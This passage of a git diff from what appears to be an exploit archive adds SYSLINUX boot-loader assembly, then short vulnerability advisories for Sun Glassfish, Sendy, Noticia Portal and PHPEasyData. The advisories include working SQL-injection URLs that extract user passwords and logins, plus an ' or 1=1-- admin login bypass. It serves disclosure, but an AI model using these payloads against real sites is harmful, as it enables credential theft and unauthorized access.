(EDD)? +; +eddcheck: + mov bx,55AAh + mov ah,41h ; EDD existence query + mov dl,[DriveNumber] + int 13h + jc .noedd + cmp bx,0AA55h + jne .noedd + test cl,1 ; Extended disk access functionality set + jz .noedd + ; + ; We have EDD support... + ; + mov byte [getlinsec.jmp+1],(getlinsec_ebios-(getlinsec.jmp+2)) +.noedd: + +; +; Load the first sector of LDLINUX.SYS; this used to be all proper +; with parsing the superblock and root directory; it doesn't fit +; together with EBIOS support, unfortunately. +; + mov eax,[FirstSector] ; Sector start + mov bx,ldlinux_sys ; Where to load it + call getonesec + + ; Some modicum of integrity checking + cmp dword [ldlinux_magic+4],LDLINUX_MAGIC^HEXDATE + jne kaboom + + ; Go for it... + jmp ldlinux_ent + +; +; getonesec: get one disk sector +; +getonesec: + mov bp,1 ; One sector + ; Fall through + +; +; getlinsec: load a sequence of BP floppy sector given by the linear sector +; number in EAX into the buffer at ES:BX. We try to optimize +; by loading up to a whole track at a time, but the user +; is responsible for not crossing a 64K boundary. +; (Yes, BP is weird for a count, but it was available...) +; +; On return, BX points to the first byte after the transferred +; block. +; +; This routine assumes CS == DS, and trashes most registers. +; +; Stylistic note: use "xchg" instead of "mov" when the source is a register +; that is dead from that point; this saves space. However, please keep +; the order to dst,src to keep things sane. +; +getlinsec: + add eax,[bsHidden] ; Add partition offset + xor edx,edx ; Zero-extend LBA (eventually allow 64 bits) + +.patch: jmp strict near .jmp + +.jmp: jmp strict short getlinsec_cbios + +; +; getlinsec_ebios: +; +; getlinsec implementation for EBIOS (EDD) +; +getlinsec_ebios: +.loop: + push bp ; Sectors left +.retry2: + call maxtrans ; Enforce maximum transfer size + movzx edi,bp ; Sectors we are about to read + mov cx,retry_count +.retry: + + ; Form DAPA on stack + push edx + push eax + push es + push bx + push di + push word 16 + mov si,sp + pushad + mov dl,[DriveNumber] + push ds + push ss + pop ds ; DS <- SS + mov ah,42h ; Extended Read + int 13h + pop ds + popad + lea sp,[si+16] ; Remove DAPA + jc .error + pop bp + add eax,edi ; Advance sector pointer + sub bp,di ; Sectors left + shl di,SECTOR_SHIFT ; 512-byte sectors + add bx,di ; Advance buffer pointer + and bp,bp + jnz .loop + + ret + +.error: + ; Some systems seem to get "stuck" in an error state when + ; using EBIOS. Doesn't happen when using CBIOS, which is + ; good, since some other systems get timeout failures + ; waiting for the floppy disk to spin up. + + pushad ; Try resetting the device + xor ax,ax + mov dl,[DriveNumber] + int 13h + popad + loop .retry ; CX-- and jump if not zero + + ;shr word [MaxTransfer],1 ; Reduce the transfer size + ;jnz .retry2 + + ; Total failure. Try falling back to CBIOS. + mov byte [getlinsec.jmp+1],(getlinsec_cbios-(getlinsec.jmp+2)) + ;mov byte [MaxTransfer],63 ; Max possibe CBIOS transfer + + pop bp + ; ... fall through ... + +; +; getlinsec_cbios: +; +; getlinsec implementation for legacy CBIOS +; +getlinsec_cbios: +.loop: + push edx + push eax + push bp + push bx + + movzx esi,word [bsSecPerTrack] + movzx edi,word [bsHeads] + ; + ; Dividing by sectors to get (track,sector): we may have + ; up to 2^18 tracks, so we need to use 32-bit arithmetric. + ; + div esi + xor cx,cx + xchg cx,dx ; CX <- sector index (0-based) + ; EDX <- 0 + ; eax = track # + div edi ; Convert track to head/cyl + + ; We should test this, but it doesn't fit... + ; cmp eax,1023 + ; ja .error + + ; + ; Now we have AX = cyl, DX = head, CX = sector (0-based), + ; BP = sectors to transfer, SI = bsSecPerTrack, + ; ES:BX = data target + ; + + call maxtrans ; Enforce maximum transfer size + + ; Must not cross track boundaries, so BP <= SI-CX + sub si,cx + cmp bp,si + jna .bp_ok + mov bp,si +.bp_ok: + + shl ah,6 ; Because IBM was STOOPID + ; and thought 8 bits were enough + ; then thought 10 bits were enough... + inc cx ; Sector numbers are 1-based, sigh + or cl,ah + mov ch,al + mov dh,dl + mov dl,[DriveNumber] + xchg ax,bp ; Sector to transfer count + mov ah,02h ; Read sectors + mov bp,retry_count +.retry: + pushad + int 13h + popad + jc .error +.resume: + movzx ecx,al ; ECX <- sectors transferred + shl ax,SECTOR_SHIFT ; Convert sectors in AL to bytes in AX + pop bx + add bx,ax + pop bp + pop eax + pop edx + add eax,ecx + sub bp,cx + jnz .loop + ret + +.error: + dec bp + jnz .retry + + xchg ax,bp ; Sectors transferred <- 0 + shr word [MaxTransfer],1 + jnz .resume + ; Fall through to disk_error + +; +; kaboom: write a message and bail out. +; +disk_error: +kaboom: + xor si,si + mov ss,si + mov sp,StackBuf-4 ; Reset stack + mov ds,si ; Reset data segment + pop dword [fdctab] ; Restore FDC table +.patch: ; When we have full code, intercept here + mov si,bailmsg + + ; Write error message, this assumes screen page 0 +.loop: lodsb + and al,al + jz .done + mov ah,0Eh ; Write to screen as TTY + mov bx,0007h ; Attribute + int 10h + jmp short .loop +.done: + cbw ; AH <- 0 + int 16h ; Wait for keypress + int 19h ; And try once more to boot... +.norge: jmp short .norge ; If int 19h returned; this is the end + +; +; Truncate BP to MaxTransfer +; +maxtrans: + cmp bp,[MaxTransfer] + jna .ok + mov bp,[MaxTransfer] +.ok: ret + +; +; Error message on failure +; +bailmsg: db 'Boot error', 0Dh, 0Ah, 0 + + ; This fails if the boot sector overflows + zb 1F8h-($-$$) + +FirstSector dd 0xDEADBEEF ; Location of sector 1 +MaxTransfer dw 0x007F ; Max transfer size +bootsignature dw 0AA55h + +; +; =========================================================================== +; End of boot sector +; =========================================================================== +; Start of LDLINUX.SYS +; =========================================================================== + +ldlinux_sys: + +syslinux_banner db 0Dh, 0Ah +%if IS_MDSLINUX + db 'MDSLINUX ' +%else + db 'SYSLINUX ' +%endif + db version_str, ' ', date, ' ', 0 + db 0Dh, 0Ah, 1Ah ; EOF if we "type" this in DOS + + align 8, db 0 +ldlinux_magic dd LDLINUX_MAGIC + dd LDLINUX_MAGIC^HEXDATE + +; +; This area is patched by the installer. It is found by looking for +; LDLINUX_MAGIC, plus 8 bytes. +; +patch_area: +LDLDwords dw 0 ; Total dwords starting at ldlinux_sys +LDLSectors dw 0 ; Number of sectors - (bootsec+this sec) +CheckSum dd 0 ; Checksum starting at ldlinux_sys + ; value = LDLINUX_MAGIC - [sum of dwords] + +; Space for up to 64 sectors, the theoretical maximum +SectorPtrs times 64 dd 0 + +ldlinux_ent: +; +; Note that some BIOSes are buggy and run the boot sector at 07C0:0000 +; instead of 0000:7C00 and the like. We don't want to add anything +; more to the boot sector, so it is written to not assume a fixed +; value in CS, but we don't want to deal with that anymore from now +; on. +; + jmp 0:.next +.next: + +; +; Tell the user we got this far +; + mov si,syslinux_banner + call writestr + +; +; Tell the user if we're using EBIOS or CBIOS +; +print_bios: + mov si,cbios_name + cmp byte [getlinsec.jmp+1],(getlinsec_ebios-(getlinsec.jmp+2)) + jne .cbios + mov si,ebios_name +.cbios: + mov [BIOSName],si + call writestr + + section .bss +%define HAVE_BIOSNAME 1 +BIOSName resw 1 + + section .text +; +; Now we read the rest of LDLINUX.SYS. Don't bother loading the first +; sector again, though. +; +load_rest: + mov si,SectorPtrs + mov bx,7C00h+2*SECTOR_SIZE ; Where we start loading + mov cx,[LDLSectors] + +.get_chunk: + jcxz .done + xor bp,bp + lodsd ; First sector of this chunk + + mov edx,eax + +.make_chunk: + inc bp + dec cx + jz .chunk_ready + inc edx ; Next linear sector + cmp [si],edx ; Does it match + jnz .chunk_ready ; If not, this is it + add si,4 ; If so, add sector to chunk + jmp short .make_chunk + +.chunk_ready: + call getlinsecsr + shl bp,SECTOR_SHIFT + add bx,bp + jmp .get_chunk + +.done: + +; +; All loaded up, verify that we got what we needed. +; Note: the checksum field is embedded in the checksum region, so +; by the time we get to the end it should all cancel out. +; +verify_checksum: + mov si,ldlinux_sys + mov cx,[LDLDwords] + mov edx,-LDLINUX_MAGIC +.checksum: + lodsd + add edx,eax + loop .checksum + + and edx,edx ; Should be zero + jz all_read ; We're cool, go for it! + +; +; Uh-oh, something went bad... +; + mov si,checksumerr_msg + call writestr + jmp kaboom + +; +; ----------------------------------------------------------------------------- +; Subroutines that have to be in the first sector +; ----------------------------------------------------------------------------- + +; +; +; writestr: write a null-terminated string to the console +; This assumes we're on page 0. This is only used for early +; messages, so it should be OK. +; +writestr: +.loop: lodsb + and al,al + jz .return + mov ah,0Eh ; Write to screen as TTY + mov bx,0007h ; Attribute + int 10h + jmp short .loop +.return: ret + + +; getlinsecsr: save registers, call getlinsec, restore registers +; +getlinsecsr: pushad + call getlinsec + popad + ret + +; +; Checksum error message +; +checksumerr_msg db ' Load error - ', 0 ; Boot failed appended + +; +; BIOS type string +; +cbios_name db 'CBIOS', 0 +ebios_name db 'EBIOS', 0 + +; +; Debug routine +; +%ifdef debug +safedumpregs: + cmp word [Debug_Magic],0D00Dh + jnz nc_return + jmp dumpregs +%endif + +rl_checkpt equ $ ; Must be <= 8000h + +rl_checkpt_off equ ($-$$) +%ifndef DEPEND +%if rl_checkpt_off > 400h +%error "Sector 1 overflow" +%endif +%endif + +; ---------------------------------------------------------------------------- +; End of code and data that have to be in the first sector +; ---------------------------------------------------------------------------- + +all_read: +; +; Let the user (and programmer!) know we got this far. This used to be +; in Sector 1, but makes a lot more sense here. +; + mov si,copyright_str + call writestr + + +; +; Insane hack to expand the superblock to dwords +; +expand_super: + xor eax,eax + mov si,superblock + mov di,SuperInfo + mov cx,superinfo_size +.loop: + lodsw + dec si + stosd ; Store expanded word + xor ah,ah + stosd ; Store expanded byte + loop .loop + +; +; Compute some information about this filesystem. +; + +; First, generate the map of regions +genfatinfo: + mov edx,[bxSectors] + and dx,dx + jnz .have_secs + mov edx,[bsHugeSectors] +.have_secs: + mov [TotalSectors],edx + + add edx,eax + mov [EndSector],edx + + mov eax,[bxResSectors] + mov [FAT],eax ; Beginning of FAT + mov edx,[bxFATsecs] + and dx,dx + jnz .have_fatsecs + mov edx,[bootsec+36] ; FAT32 BPB_FATsz32 +.have_fatsecs: + imul edx,[bxFATs] + add eax,edx + mov [RootDirArea],eax ; Beginning of root directory + mov [RootDir],eax ; For FAT12/16 == root dir location + + mov edx,[bxRootDirEnts] + add dx,SECTOR_SIZE/32-1 + shr dx,SECTOR_SHIFT-5 + mov [RootDirSize],edx + add eax,edx + mov [DataArea],eax ; Beginning of data area + +; Next, generate a cluster size shift count and mask + mov eax,[bxSecPerClust] + bsr cx,ax + mov [ClustShift],cl + push cx + add cl,9 + mov [ClustByteShift],cl + pop cx + dec ax + mov [ClustMask],eax + inc ax + shl eax,9 + mov [ClustSize],eax + +; +; FAT12, FAT16 or FAT28^H^H32? This computation is fscking ridiculous. +; +getfattype: + mov eax,[EndSector] + sub eax,[DataArea] + shr eax,cl ; cl == ClustShift + mov cl,nextcluster_fat12-(nextcluster+2) + cmp eax,4085 ; FAT12 limit + jb .setsize + mov cl,nextcluster_fat16-(nextcluster+2) + cmp eax,65525 ; FAT16 limit + jb .setsize + ; + ; FAT32, root directory is a cluster chain + ; + mov cl,[ClustShift] + mov eax,[bootsec+44] ; Root directory cluster + sub eax,2 + shl eax,cl + add eax,[DataArea] + mov [RootDir],eax + mov cl,nextcluster_fat28-(nextcluster+2) +.setsize: + mov byte [nextcluster+1],cl + +; +; Common initialization code +; +%include "cpuinit.inc" +%include "init.inc" + +; +; Clear Files structures +; + mov di,Files + mov cx,(MAX_OPEN*open_file_t_size)/4 + xor eax,eax + rep stosd + +; +; Initialize the metadata cache +; + call initcache + +; +; Now, everything is "up and running"... patch kaboom for more +; verbosity and using the full screen system +; + ; E9 = JMP NEAR + mov dword [kaboom.patch],0e9h+((kaboom2-(kaboom.patch+3)) << 8) + +; +; Now we're all set to start with our *real* business. First load the +; configuration file (if any) and parse it. +; +; In previous versions I avoided using 32-bit registers because of a +; rumour some BIOSes clobbered the upper half of 32-bit registers at +; random. I figure, though, that if there are any of those still left +; they probably won't be trying to install Linux on them... +; +; The code is still ripe with 16-bitisms, though. Not worth the hassle +; to take'm out. In fact, we may want to put them back if we're going +; to boot ELKS at some point. +; + +; +; Load configuration file +; + mov di,syslinux_cfg + call open + jz no_config_file + +; +; Now we have the config file open. Parse the config file and +; run the user interface. +; +%include "ui.inc" + +; +; Linux kernel loading code is common. +; +%include "runkernel.inc" + +; +; COMBOOT-loading code +; +%include "comboot.inc" +%include "com32.inc" +%include "cmdline.inc" + +; +; Boot sector loading code +; +%include "bootsect.inc" + +; +; Boot a specified local disk. AX specifies the BIOS disk number; or +; 0xFFFF in case we should execute INT 18h ("next device.") +; +local_boot: +%ifdef WITH_GFX + call gfx_done +%endif + call vgaclearmode + lss sp,[cs:Stack] ; Restore stack pointer + xor dx,dx + mov ds,dx + mov es,dx + mov fs,dx + mov gs,dx + mov si,localboot_msg + call cwritestr + cmp ax,-1 + je .int18 + + ; Load boot sector from the specified BIOS device and jump to it. + mov dl,al + xor dh,dh + push dx + xor ax,ax ; Reset drive + int 13h + mov ax,0201h ; Read one sector + mov cx,0001h ; C/H/S = 0/0/1 (first sector) + mov bx,trackbuf + int 13h + pop dx + cli ; Abandon hope, ye who enter here + mov si,trackbuf + mov di,07C00h + mov cx,512 ; Probably overkill, but should be safe + rep movsd + mov ss,cx + mov sp,7c00h + jmp 0:07C00h ; Jump to new boot sector + +.int18: + int 18h ; Hope this does the right thing... + jmp kaboom ; If we returned, oh boy... + +; +; Abort loading code +; +%include "abort.inc" + +; +; allocate_file: Allocate a file structure +; +; If successful: +; ZF set +; BX = file pointer +; In unsuccessful: +; ZF clear +; +allocate_file: + TRACER 'a' + push cx + mov bx,Files + mov cx,MAX_OPEN +.check: cmp dword [bx], byte 0 + je .found + add bx,open_file_t_size ; ZF = 0 + loop .check + ; ZF = 0 if we fell out of the loop +.found: pop cx + ret + +; +; searchdir: +; Search the root directory for a pre-mangled filename in DS:DI. +; +; NOTE: This file considers finding a zero-length file an +; error. This is so we don't have to deal with that special +; case elsewhere in the program (most loops have the test +; at the end). +; +; If successful: +; ZF clear +; SI = file pointer +; DX:AX = file length in bytes +; If unsuccessful +; ZF set +; + +searchdir: + push bx + call allocate_file + jnz .alloc_failure + + push cx + push gs + push es + push ds + pop es ; ES = DS + + mov eax,[RootDir] ; First root directory sector + +.scansector: + call getcachesector + ; GS:SI now points to this sector + + mov cx,SECTOR_SIZE/32 ; 32 == directory entry size +.scanentry: + cmp byte [gs:si],0 + jz .failure ; Hit directory high water mark + push cx + push si + push di + mov cx,11 + gs repe cmpsb + pop di + pop si + pop cx + jz .found + add si,32 + loop .scanentry + + call nextsector + jnc .scansector ; CF is set if we're at end + + ; If we get here, we failed +.failure: + pop es + pop gs + pop cx +.alloc_failure: + pop bx + xor eax,eax ; ZF <- 1 + ret +.found: + mov eax,[gs:si+28] ; File size + add eax,SECTOR_SIZE-1 + shr eax,SECTOR_SHIFT + jz .failure ; Zero-length file + mov [bx+4],eax + + mov cl,[ClustShift] + mov dx,[gs:si+20] ; High cluster word + shl edx,16 + mov dx,[gs:si+26] ; Low cluster word + sub edx,2 + shl edx,cl + add edx,[DataArea] + mov [bx],edx ; Starting sector + + mov eax,[gs:si+28] ; File length again + mov dx,[gs:si+30] ; 16-bitism, sigh + mov si,bx + and eax,eax ; ZF <- 0 + + pop es + pop gs + pop cx + pop bx + ret + +; +; +; kaboom2: once everything is loaded, replace the part of kaboom +; starting with "kaboom.patch" with this part + +kaboom2: + cmp byte [gfx_ok],0 + jz .nogfx + mov si,err_failed_gfx + xor di,di + mov al,1 + call gfx_infobox + call gfx_done + call do_reboot +.nogfx: + mov si,err_bootfailed + call cwritestr + call getchar + call vgaclearmode + int 19h ; And try once more to boot... +.norge: jmp short .norge ; If int 19h returned; this is the end + +; +; mangle_name: Mangle a DOS filename pointed to by DS:SI into a buffer pointed +; to by ES:DI; ends on encountering any whitespace +; + +mangle_name: + mov cx,11 ; # of bytes to write +mn_loop: + lodsb + cmp al,' ' ; If control or space, end + jna mn_end + cmp al,'.' ; Period -> space-fill + je mn_is_period + cmp al,'a' + jb mn_not_lower + cmp al,'z' + ja mn_not_uslower + sub al,020h + jmp short mn_not_lower +mn_is_period: mov al,' ' ; We need to space-fill +mn_period_loop: cmp cx,3 ; If <= 3 characters left + jbe mn_loop ; Just ignore it + stosb ; Otherwise, write a period + loop mn_period_loop ; Dec CX and (always) jump +mn_not_uslower: cmp al,ucase_low + jb mn_not_lower + cmp al,ucase_high + ja mn_not_lower + mov bx,ucase_tab-ucase_low + cs xlatb +mn_not_lower: stosb + loop mn_loop ; Don't continue if too long +mn_end: + mov al,' ' ; Space-fill name + rep stosb ; Doesn't do anything if CX=0 + ret ; Done + +; +; Upper-case table for extended characters; this is technically code page 865, +; but code page 437 users will probably not miss not being able to use the +; cent sign in kernel images too much :-) +; +; The table only covers the range 129 to 164; the rest we can deal with. +; +ucase_low equ 129 +ucase_high equ 164 +ucase_tab db 154, 144, 'A', 142, 'A', 143, 128, 'EEEIII' + db 142, 143, 144, 146, 146, 'O', 153, 'OUUY', 153, 154 + db 157, 156, 157, 158, 159, 'AIOU', 165 + +; +; unmangle_name: Does the opposite of mangle_name; converts a DOS-mangled +; filename to the conventional representation. This is needed +; for the BOOT_IMAGE= parameter for the kernel. +; NOTE: A 13-byte buffer is mandatory, even if the string is +; known to be shorter. +; +; DS:SI -> input mangled file name +; ES:DI -> output buffer +; +; On return, DI points to the first byte after the output name, +; which is set to a null byte. +; +unmangle_name: + push si ; Save pointer to original name + mov cx,8 + mov bp,di +un_copy_body: lodsb + call lower_case + stosb + cmp al,' ' + jbe un_cb_space + mov bp,di ; Position of last nonblank+1 +un_cb_space: loop un_copy_body + mov di,bp + mov al,'.' ; Don't save + stosb + mov cx,3 +un_copy_ext: lodsb + call lower_case + stosb + cmp al,' ' + jbe un_ce_space + mov bp,di +un_ce_space: loop un_copy_ext + mov di,bp + mov byte [es:di], 0 + pop si + ret + +; +; lower_case: Lower case a character in AL +; +lower_case: + cmp al,'A' + jb lc_ret + cmp al,'Z' + ja lc_1 + or al,20h + ret +lc_1: cmp al,lcase_low + jb lc_ret + cmp al,lcase_high + ja lc_ret + push bx + mov bx,lcase_tab-lcase_low + cs xlatb + pop bx +lc_ret: ret + +; +; getfssec_edx: Get multiple sectors from a file +; +; This routine makes sure the subtransfers do not cross a 64K boundary, +; and will correct the situation if it does, UNLESS *sectors* cross +; 64K boundaries. +; +; ES:BX -> Buffer +; EDX -> Current sector number +; CX -> Sector count (0FFFFh = until end of file) +; Must not exceed the ES segment +; Returns EDX=0, CF=1 on EOF (not necessarily error) +; All arguments are advanced to reflect data read. +; +getfssec_edx: + push ebp + push eax +.getfragment: + xor ebp,ebp ; Fragment sector count + push edx ; Starting sector pointer +.getseccnt: + inc bp + dec cx + jz .do_read + xor eax,eax + mov ax,es + shl ax,4 + add ax,bx ; Now AX = how far into 64K block we are + not ax ; Bytes left in 64K block + inc eax + shr eax,SECTOR_SHIFT ; Sectors left in 64K block + cmp bp,ax + jnb .do_read ; Unless there is at least 1 more sector room... + mov eax,edx ; Current sector + inc edx ; Predict it's the linearly next sector + call nextsector + jc .do_read + cmp edx,eax ; Did it match? + jz .getseccnt +.do_read: + pop eax ; Starting sector pointer + call getlinsecsr + lea eax,[eax+ebp-1] ; This is the last sector actually read + shl bp,9 + add bx,bp ; Adjust buffer pointer + call nextsector + jc .eof + mov edx,eax + and cx,cx + jnz .getfragment +.done: + pop eax + pop ebp + ret +.eof: + xor edx,edx + stc + jmp .done + +; +; getfssec: Get multiple sectors from a file +; +; Same as above, except SI is a pointer to a open_file_t +; +; ES:BX -> Buffer +; DS:SI -> Pointer to open_file_t +; CX -> Sector count (0FFFFh = until end of file) +; Must not exceed the ES segment +; Returns CF=1 on EOF (not necessarily error) +; All arguments are advanced to reflect data read. +; +getfssec: + push edx + movzx edx,cx + cmp edx,[si+4] + jbe .sizeok + mov edx,[si+4] + mov cx,dx +.sizeok: + sub [si+4],edx + mov edx,[si] + call getfssec_edx + mov [si],edx + pop edx + ret + +; +; nextcluster: Advance a cluster pointer in EDI to the next cluster +; pointed at in the FAT tables. CF=0 on return if end of file. +; +nextcluster: + jmp strict short nextcluster_fat28 ; This gets patched + +nextcluster_fat12: + push eax + push edx + push bx + push cx + push si + mov edx,edi + shr edi,1 + pushf ; Save the shifted-out LSB (=CF) + add edx,edi + mov eax,edx + shr eax,9 + call getfatsector + mov bx,dx + and bx,1FFh + mov cl,[gs:si+bx] + inc edx + mov eax,edx + shr eax,9 + call getfatsector + mov bx,dx + and bx,1FFh + mov ch,[gs:si+bx] + popf + jnc .even + shr cx,4 +.even: and cx,0FFFh + movzx edi,cx + cmp di,0FF0h + pop si + pop cx + pop bx + pop edx + pop eax + ret + +; +; FAT16 decoding routine. +; +nextcluster_fat16: + push eax + push si + push bx + mov eax,edi + shr eax,SECTOR_SHIFT-1 + call getfatsector + mov bx,di + add bx,bx + and bx,1FEh + movzx edi,word [gs:si+bx] + cmp di,0FFF0h + pop bx + pop si + pop eax + ret +; +; FAT28 ("FAT32") decoding routine. +; +nextcluster_fat28: + push eax + push si + push bx + mov eax,edi + shr eax,SECTOR_SHIFT-2 + call getfatsector + mov bx,di + add bx,bx + add bx,bx + and bx,1FCh + mov edi,dword [gs:si+bx] + and edi,0FFFFFFFh ; 28 bits only + cmp edi,0FFFFFF0h + pop bx + pop si + pop eax + ret + +; +; nextsector: Given a sector in EAX on input, return the next sector +; of the same filesystem object, which may be the root +; directory or a cluster chain. Returns EOF. +; +; Assumes CS == DS. +; +nextsector: + push edi + push edx + mov edx,[DataArea] + mov edi,eax + sub edi,edx + jae .isdata + + ; Root directory + inc eax + cmp eax,edx + cmc + jmp .done + +.isdata: + not edi + test edi,[ClustMask] + jz .endcluster + + ; It's not the final sector in a cluster + inc eax + jmp .done + +.endcluster: + push gs ; nextcluster trashes gs + push cx + not edi + mov cl,[ClustShift] + shr edi,cl + add edi,2 + + ; Now EDI contains the cluster number + call nextcluster + cmc + jc .exit ; There isn't anything else... + + ; New cluster number now in EDI + sub edi,2 + shl edi,cl ; CF <- 0, unless something is very wrong + lea eax,[edi+edx] +.exit: + pop cx + pop gs +.done: + pop edx + pop edi + ret + +; +; getfatsector: Check for a particular sector (in EAX) in the FAT cache, +; and return a pointer in GS:SI, loading it if needed. +; +; Assumes CS == DS. +; +getfatsector: + add eax,[FAT] ; FAT starting address + jmp getcachesector + +; ----------------------------------------------------------------------------- +; Common modules +; ----------------------------------------------------------------------------- + +%include "getc.inc" ; getc et al +%include "conio.inc" ; Console I/O +%include "plaincon.inc" ; writechr +%include "writestr.inc" ; String output +%include "parseconfig.inc" ; High-level config file handling +%include "parsecmd.inc" ; Low-level config file handling +%include "bcopy32.inc" ; 32-bit bcopy +%include "loadhigh.inc" ; Load a file into high memory +%include "font.inc" ; VGA font stuff +%include "graphics.inc" ; VGA graphics +%include "highmem.inc" ; High memory sizing +%include "strcpy.inc" ; strcpy() +%include "cache.inc" ; Metadata disk cache + +%include "gfxboot.inc" ; add gfx things + +; ----------------------------------------------------------------------------- +; Begin data section +; ----------------------------------------------------------------------------- + + section .data +; +; Lower-case table for codepage 865 +; +lcase_low equ 128 +lcase_high equ 165 +lcase_tab db 135, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138 + db 139, 140, 141, 132, 134, 130, 145, 145, 147, 148, 149 + db 150, 151, 152, 148, 129, 155, 156, 155, 158, 159, 160 + db 161, 162, 163, 164, 164 + +copyright_str db ' Copyright (C) 1994-', year, ' H. Peter Anvin' + db CR, LF, 0 +boot_prompt db 'boot: ', 0 +wipe_char db BS, ' ', BS, 0 +err_notfound db 'Could not find kernel image: ',0 +err_notkernel db CR, LF, 'Invalid or corrupt kernel image.', CR, LF, 0 +err_noram db 'It appears your computer has less than ' + asciidec dosram_k + db 'K of low ("DOS")' + db CR, LF + db 'RAM. Linux needs at least this amount to boot. If you get' + db CR, LF + db 'this message in error, hold down the Ctrl key while' + db CR, LF + db 'booting, and I will take your word for it.', CR, LF, 0 +err_badcfg db 'Unknown keyword in syslinux.cfg.', CR, LF, 0 +err_noparm db 'Missing parameter in syslinux.cfg.', CR, LF, 0 +err_noinitrd db CR, LF +err_noinitrda db 'Could not find ramdisk image: ', 0 +err_nohighmem db 'Not enough memory to load specified kernel.', CR, LF, 0 +err_highload db CR, LF, 'Kernel transfer failure.', CR, LF, 0 +err_oldkernel db 'Cannot load a ramdisk with an old kernel image.' + db CR, LF, 0 +err_notdos db ': attempted DOS system call', CR, LF, 0 +err_comlarge db 'COMBOOT image too large.', CR, LF, 0 +err_a20 db CR, LF, 'A20 gate not responding!', CR, LF, 0 +err_bootfailed db CR, LF, 'Boot failed: please change disks and press ' + db 'a key to continue.', CR, LF, 0 +err_failed_gfx db 'Error reading from disk.', 0 +ready_msg db 'Ready.', CR, LF, 0 +localboot_msg db 'Booting from local disk...', CR, LF, 0 +crlfloading_msg db CR, LF +loading_msg db 'Loading ', 0 +dotdot_msg db '.' +dot_msg db '.', 0 +aborted_msg db ' aborted.' ; Fall through to crlf_msg! +crlf_msg db CR, LF +null_msg db 0 +crff_msg db CR, FF, 0 +syslinux_cfg db 'SYSLINUXCFG' ; Mangled form +ConfigName db 'syslinux.cfg',0 ; Unmangled form +%if IS_MDSLINUX +manifest db 'MANIFEST ' +%endif +; +; Command line options we'd like to take a look at +; +; mem= and vga= are handled as normal 32-bit integer values +initrd_cmd db 'initrd=' +initrd_cmd_len equ 7 + +; +; Config file keyword table +; +%include "keywords.inc" + +; +; Extensions to search for (in *forward* order). +; +exten_table: db 'CBT',0 ; COMBOOT (specific) + db 'BSS',0 ; Boot Sector (add superblock) + db 'BS ',0 ; Boot Sector + db 'COM',0 ; COMBOOT (same as DOS) + db 'C32',0 ; COM32 +exten_table_end: + dd 0, 0 ; Need 8 null bytes here + +; +; Misc initialized (data) variables +; +%ifdef debug ; This code for debugging only +debug_magic dw 0D00Dh ; Debug code sentinel +%endif + + alignb 4, db 0 +BufSafe dw trackbufsize/SECTOR_SIZE ; Clusters we can load into trackbuf +BufSafeSec dw trackbufsize/SECTOR_SIZE ; = how many sectors? +BufSafeBytes dw trackbufsize ; = how many bytes? +EndOfGetCBuf dw getcbuf+trackbufsize ; = getcbuf+BufSafeBytes +%ifndef DEPEND +%if ( trackbufsize % SECTOR_SIZE ) != 0 +%error trackbufsize must be a multiple of SECTOR_SIZE +%endif +%endif + diff --git a/platforms/multiple/remote/31901.txt b/platforms/multiple/remote/31901.txt new file mode 100755 index 000000000..fab339ab8 --- /dev/null +++ b/platforms/multiple/remote/31901.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/29646/info + +Sun Glassfish is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/configuration/httpListenerEdit.jsf?name=&configName=server-config \ No newline at end of file diff --git a/platforms/php/webapps/31898.txt b/platforms/php/webapps/31898.txt new file mode 100755 index 000000000..5e8beb9a3 --- /dev/null +++ b/platforms/php/webapps/31898.txt @@ -0,0 +1,9 @@ +# Exploit Title: Sendy SqlInject +# Date: 2014-02-24 +# Exploit Author: Hurley +# Vendor Homepage: http://sendy.co/ +# Software Link: http://sendy.co/ +# Version: 1.1.8.4 + +Demo page: +http://server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- diff --git a/platforms/php/webapps/31902.txt b/platforms/php/webapps/31902.txt new file mode 100755 index 000000000..44be19e2c --- /dev/null +++ b/platforms/php/webapps/31902.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/29655/info + +Noticia Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/detalle_noticia.php?id_noticia=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/31904.txt b/platforms/php/webapps/31904.txt new file mode 100755 index 000000000..babce88f0 --- /dev/null +++ b/platforms/php/webapps/31904.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/29659/info + +PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHPEasyData 1.5.4 is vulnerable; other versions may also be affected. + +http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users \ No newline at end of file diff --git a/platforms/php/webapps/31905.txt b/platforms/php/webapps/31905.txt new file mode 100755 index 000000000..d0e108c5a --- /dev/null +++ b/platforms/php/webapps/31905.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/29659/info + +PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Attackers may exploit the SQL-injection issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHPEasyData 1.5.4 is vulnerable; other versions may also be affected. + +-admin/login.php +Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login: +' or 1=1-- /** \ No newline at end of file diff --git a/platforms/php/webapps/31906.txt b/platforms/php/webapps/31906.txt new file mode 100755 index 000000000..be686262b --- /dev/null +++ b/platforms/php/webapps/31906.txt @@ -0,0 +1,11 